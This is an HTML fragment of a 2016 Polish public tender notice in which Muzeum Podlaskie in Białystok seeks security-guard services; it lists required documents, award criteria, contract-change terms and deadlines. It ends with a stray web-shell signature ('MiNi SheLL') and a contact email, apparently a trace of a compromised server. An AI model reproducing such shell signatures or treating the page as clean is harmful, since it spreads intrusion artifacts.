<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Podpisane oświadczenie o spełnieniu warunków zgodnie z art.44 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych ( Załącznik Nr 4 do SIWZ). 
Wypełniony zgodnie z treścią i podpisany formularz Oferta wraz z załącznikami do oferty, stanowiący  Załącznik  Nr 1  do SIWZ  
Podpisane oświadczenie o akceptacji warunków postępowania, w tym warunków  umowy, stanowiące Załącznik  7 do SIWZ 
Pełnomocnictwo do podpisania oferty i innych dokumentów, jeżeli upoważnienie do ich zło-żenia nie wynika z przepisów bądź zapisów właściwego rejestru. 
Koncesję wydaną przez MSWiA na podstawie ustawy o ochronie osób i mienia w zakresie usług ochrony osób i mienia ważną przez cały okres, na który udzielone zostanie zamówienie.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia warunek posiadania upraw-nień musi spełniać oddzielnie każdy z tych wykonawców.
Polisę, a w przypadku jej braku, innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  2.000.000,00 zł lub oświadczenia, że z dniem podpisania umowy Wykonawca posiadać będzie ubezpieczenie na kwotę nie mniejszą niż 2.000.000,00 zł. 
Wykonawcy wspólnie ubiegający się o zamówienie spełnią ten warunek łącznie.
Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - doświadczenie w ochronie obiektów i mienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do  treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie: 
	zmiany stawki podatku VAT, przy założeniu, że cena brutto ulegnie zmianie w stopniu  wynikającym ze zmiany stawki podatkowej, zaś cena netto pozostanie bez zmian, 
	zmiany przedstawicieli stron umowy, 
	zmniejszenia zakresu wykonywanej usługi lub zmiana sposobu jej wykonania, 
	jeżeli konieczność zmiany jest spowodowana wystąpieniem niezależnych od stron okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia umowy, a które uniemożliwiają prawidłową realizację przedmiotu umowy zgodnie z jej postanowieniami, tj. działania siły wyższej,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie w Białymstoku
Ratusz - Rynek Kościuszki 10 
15-426 Białystok
dział administarcyjno - gospodarczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2016 godzina 09:30, miejsce: Muzeum Podlaskie w Białymstoku
Ratusz - Rynek Kościuszki 10 , 15-426 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com